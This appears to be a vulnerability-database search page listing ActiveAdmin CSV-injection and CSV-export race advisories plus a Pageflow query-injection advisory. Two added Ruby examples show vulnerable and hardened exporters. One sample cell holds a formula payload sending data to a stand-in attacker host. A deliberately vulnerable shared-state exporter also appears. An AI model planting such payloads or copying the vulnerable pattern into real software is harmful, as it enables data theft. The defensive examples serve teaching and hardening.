46 matches found
GHSA-XHVV-3JWW-C487 ActiveAdmin CSV Injection leading to sensitive information disclosure
Impact In ActiveAdmin versions prior to 3.2.0, maliciously crafted spreadsheet formulas could be uploaded as part of admin data that, when exported to a CSV file and then imported into a spreadsheet program like LibreOffice, could lead to remote code execution and private data exfiltration. The...
CVE-2023-50448
Summary: CVE-2023-50448 affects ActiveAdmin (Ruby on Rails) before 2.12.0, where a concurrency issue in the CSV export path can let a user access data belonging to another user. The root cause is a shared, unsynchronized variable that holds the collection to be exported, allowing timing-based lea...
CVE-2023-50448
In ActiveAdmin aka Active Admin before 2.12.0, a concurrency issue allows a malicious actor to access potentially private data that belongs to another user by making CSV export requests at certain specific times...
GHSA-RQXC-9P8H-XQGQ Duplicate Advisory: ActiveAdmin vulnerable to CSV injection
Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-xhvv-3jww-c487. This link is maintained to preserve external references. Original Description csvbuilder.rb in ActiveAdmin aka Active Admin before 3.2.0 allows CSV injection...
CVE-2023-51763
csvbuilder.rb in ActiveAdmin aka Active Admin before 3.2.0 allows CSV injection...
Input validation
csvbuilder.rb in ActiveAdmin aka Active Admin before 3.2.0 allows CSV injection...
ActiveAdmin vulnerable to CSV injection
csvbuilder.rb in ActiveAdmin aka Active Admin before 3.2.0 allows CSV injection...
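The CSV injection these entries describe (GHSA-xhvv-3jww-c487 / CVE-2023-51763: a formula stored as admin data, written verbatim into an export, evaluated when the file is opened in a spreadsheet), as an added Ruby example that is not ActiveAdmin's csvbuilder.rb and not its 3.2.0 fix. It shows a naive export that writes values verbatim, the same export with OWASP-style neutralisation of formula-leading cells, and a scanner for auditing exports that already exist. The sample rows, the `attacker.example` host and all function names are constructed for the example.

```ruby
require "csv"

# Leading characters that spreadsheet programs interpret as the start of a
# formula (the list OWASP gives for CSV injection; tab and carriage return are
# included because some programs honour them as cell prefixes too).
FORMULA_TRIGGERS = ["=", "+", "-", "@", "\t", "\r"].freeze

# A cell that is just a number (e.g. a negative balance) is not a formula even
# though it starts with "-"; exempting it avoids mangling numeric columns.
def numeric_literal?(str)
  str.match?(/\A[+-]?\d+(\.\d+)?\z/)
end

def formula_like?(str)
  !str.empty? && !numeric_literal?(str) && FORMULA_TRIGGERS.include?(str[0])
end

# Vulnerable pattern: every value is written verbatim. CSV quoting protects the
# CSV structure (commas, quotes) but tells the spreadsheet nothing about
# whether the cell is a formula, so the payload survives intact.
def export_csv_unsafe(rows)
  CSV.generate { |csv| rows.each { |row| csv << row } }
end

# Hardened pattern: prefix formula-like cells with a single quote so the
# spreadsheet treats them as text (OWASP recommendation; assumes the consumer
# of the file is a spreadsheet program).
def sanitize_cell(value)
  str = value.to_s
  formula_like?(str) ? "'" + str : str
end

def export_csv_safe(rows)
  CSV.generate { |csv| rows.each { |row| csv << row.map { |cell| sanitize_cell(cell) } } }
end

# Audit helper for exports that already exist: returns [row, column] pairs of
# cells a spreadsheet would evaluate. nil cells (empty fields) are skipped.
def formula_cells(csv_text)
  CSV.parse(csv_text).each_with_index.flat_map do |row, r|
    row.each_index.select { |c| row[c] && formula_like?(row[c]) }.map { |c| [r, c] }
  end
end

# Constructed sample: an admin-entered "note" field carrying a hyperlink payload
# that sends the neighbouring cell to attacker.example when clicked.
SAMPLE_ROWS = [
  ["name", "balance", "note"],
  ["Alice", -5, "paid late"],
  ["Mallory", 0, "=HYPERLINK(\"http://attacker.example/?\"&B3,\"invoice\")"],
].freeze

if __FILE__ == $PROGRAM_NAME
  puts "unsafe export flags: #{formula_cells(export_csv_unsafe(SAMPLE_ROWS)).inspect}"
  puts "safe export flags:   #{formula_cells(export_csv_safe(SAMPLE_ROWS)).inspect}"
  puts export_csv_safe(SAMPLE_ROWS)
end
```

Two practical caveats: the leading quote is visible to any consumer that is not a spreadsheet (a downstream importer will see `'=...` as data), and the numeric-literal exemption is what keeps `-5` sortable as a number; an expression such as `-1+1` still gets neutralised because it is not a plain literal.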
Sensitive Information Disclosure
activeadmin is vulnerable to Sensitive Information Disclosure. The vulnerability is caused by a concurrency issue wherein a malicious user is able to access private data of another user. The export data feature is affected, caused by a variable holding the collection to be exported which is not...
Information Exposure
Overview Affected versions of this package are vulnerable to Information Exposure due to a concurrency issue that results in a shared variable not being properly synchronized. An attacker with access to the same ActiveAdmin application can obtain private data intended for another user by timing...
GHSA-356J-HG45-X525 Potential CSV export data leak
Impact In ActiveAdmin versions prior to 2.12.0, a concurrency issue was found that could allow a malicious actor to access potentially private data that belongs to another user. The bug affects the functionality to export data as CSV files, and was caused by a variable holding the...
PT-2023-31554 · Unknown · Activeadmin
Name of the Vulnerable Software and Affected Versions: ActiveAdmin versions prior to 2.12.0 Description: A concurrency issue in ActiveAdmin allows a malicious actor to access potentially private data belonging to another user by making CSV export requests at specific times. The issue is caused by...
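The race the CVE-2023-50448 / GHSA-356j-hg45-x525 entries above describe (the collection to be exported held in a variable shared between concurrent export requests, so a request issued at the right moment reads another user's rows), as an added plain-Ruby illustration that is not ActiveAdmin's code or its 2.12.0 fix. It pairs a deliberately vulnerable exporter that keeps the collection in instance state on an object shared across threads with a per-request variant, and forces the losing interleaving deterministically with queues rather than relying on timing. The user names, rows and the `hook` interleaving point are constructed for the example.

```ruby
require "csv"

# Constructed data: each user may export only their own rows.
USER_ROWS = {
  "alice" => [["id", "secret"], [1, "alice-only"]],
  "bob"   => [["id", "secret"], [2, "bob-only"]],
}.freeze

# Deliberately vulnerable: the collection is stashed in instance state on an
# exporter object that (like a memoised builder in a threaded app server) is
# shared by every request. Between the assignment and the render another
# request can overwrite it. `hook` is a constructed interleaving point.
class SharedStateExporter
  attr_accessor :hook

  def export(rows)
    @collection = rows
    hook&.call
    render
  end

  private

  def render
    CSV.generate { |csv| @collection.each { |row| csv << row } }
  end
end

# Fixed pattern: the collection lives in a local and is passed explicitly, so
# concurrent requests cannot see each other's data even on a shared object.
class PerRequestExporter
  attr_accessor :hook

  def export(rows)
    collection = rows
    hook&.call
    render(collection)
  end

  private

  def render(collection)
    CSV.generate { |csv| collection.each { |row| csv << row } }
  end
end

# Force the losing interleaving deterministically: A stashes its rows and
# pauses, B stashes its rows and signals, A resumes and renders whatever is
# stashed now.
def race(exporter)
  a_ready = Queue.new
  b_done  = Queue.new
  exporter.hook = proc do
    case Thread.current[:role]
    when :a then a_ready << true; b_done.pop
    when :b then b_done << true
    end
  end
  thread_a = Thread.new { Thread.current[:role] = :a; exporter.export(USER_ROWS["alice"]) }
  thread_b = Thread.new { Thread.current[:role] = :b; a_ready.pop; exporter.export(USER_ROWS["bob"]) }
  { alice: thread_a.value, bob: thread_b.value }
end

# True when the CSV handed back to Alice contains Bob's rows.
def leaked?(csv_for_alice)
  csv_for_alice.include?("bob-only")
end

if __FILE__ == $PROGRAM_NAME
  puts "shared-state exporter leaks: #{leaked?(race(SharedStateExporter.new)[:alice])}"
  puts "per-request exporter leaks:  #{leaked?(race(PerRequestExporter.new)[:alice])}"
end
```

In a real deployment the `hook` is simply the time the database query and CSV rendering take, which is why the advisory text says the leak needs requests "at certain specific times"; the fix is structural (no per-request data on shared objects), not a timing tweak.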
GHSA-WRRW-CRP8-979Q Pageflow vulnerable to sensitive user data extraction via Ransack query injection
Impact The attack allows extracting sensitive properties of database objects that are associated with users or entries belonging to an account that the attacker has access to. Pageflow uses the ActiveAdmin Ruby library to provide some management features to its users. ActiveAdmin relies on the...